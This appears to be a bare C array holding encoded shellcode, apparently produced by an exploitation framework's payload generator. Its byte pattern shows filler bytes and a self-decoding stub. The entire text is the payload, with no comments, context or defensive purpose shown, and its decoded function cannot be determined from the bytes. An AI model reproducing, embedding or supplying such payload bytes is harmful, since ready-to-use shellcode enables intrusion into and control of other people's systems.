unsigned char buf[] = 
"\x93\x99\x41\x9b\xf8\x43\x92\x4a\x3f\x3f\x37\x90\xf9\x27\x92"
"\x43\xda\xd8\xd9\x74\x24\xf4\x5e\xba\xb4\x49\x27\xe6\x31\xc9"
"\xb1\x52\x31\x56\x17\x83\xee\xfc\x03\xe2\x5a\xc5\x13\xf6\xb5"
"\x8b\xdc\x06\x46\xec\x55\xe3\x77\x2c\x01\x60\x27\x9c\x41\x24"
"\xc4\x57\x07\xdc\x5f\x15\x80\xd3\xe8\x90\xf6\xda\xe9\x89\xcb"
"\x7d\x6a\xd0\x1f\x5d\x53\x1b\x52\x9c\x94\x46\x9f\xcc\x4d\x0c"
"\x32\xe0\xfa\x58\x8f\x8b\xb1\x4d\x97\x68\x01\x6f\xb6\x3f\x19"
"\x36\x18\xbe\xce\x42\x11\xd8\x13\x6e\xeb\x53\xe7\x04\xea\xb5"
"\x39\xe4\x41\xf8\xf5\x17\x9b\x3d\x31\xc8\xee\x37\x41\x75\xe9"
"\x8c\x3b\xa1\x7c\x16\x9b\x22\x26\xf2\x1d\xe6\xb1\x71\x11\x43"
"\xb5\xdd\x36\x52\x1a\x56\x42\xdf\x9d\xb8\xc2\x9b\xb9\x1c\x8e"
"\x78\xa3\x05\x6a\x2e\xdc\x55\xd5\x8f\x78\x1e\xf8\xc4\xf0\x7d"
"\x95\x29\x39\x7d\x65\x26\x4a\x0e\x57\xe9\xe0\x98\xdb\x62\x2f"
"\x5f\x1b\x59\x97\xcf\xe2\x62\xe8\xc6\x20\x36\xb8\x70\x80\x37"
"\x53\x80\x2d\xe2\xf4\xd0\x81\x5d\xb5\x80\x61\x0e\x5d\xca\x6d"
"\x71\x7d\xf5\xa7\x1a\x14\x0c\x20\xe5\x41\x36\xb3\x8d\x93\x46"
"\xb2\xf6\x1d\xa0\xde\x18\x48\x7b\x77\x80\xd1\xf7\xe6\x4d\xcc"
"\x72\x28\xc5\xe3\x83\xe7\x2e\x89\x97\x90\xde\xc4\xc5\x37\xe0"
"\xf2\x61\xdb\x73\x99\x71\x92\x6f\x36\x26\xf3\x5e\x4f\xa2\xe9"
"\xf9\xf9\xd0\xf3\x9c\xc2\x50\x28\x5d\xcc\x59\xbd\xd9\xea\x49"
"\x7b\xe1\xb6\x3d\xd3\xb4\x60\xeb\x95\x6e\xc3\x45\x4c\xdc\x8d"
"\x01\x09\x2e\x0e\x57\x16\x7b\xf8\xb7\xa7\xd2\xbd\xc8\x08\xb3"
"\x49\xb1\x74\x23\xb5\x68\x3d\x43\x54\xb8\x48\xec\xc1\x29\xf1"
"\x71\xf2\x84\x36\x8c\x71\x2c\xc7\x6b\x69\x45\xc2\x30\x2d\xb6"
"\xbe\x29\xd8\xb8\x6d\x49\xc9";
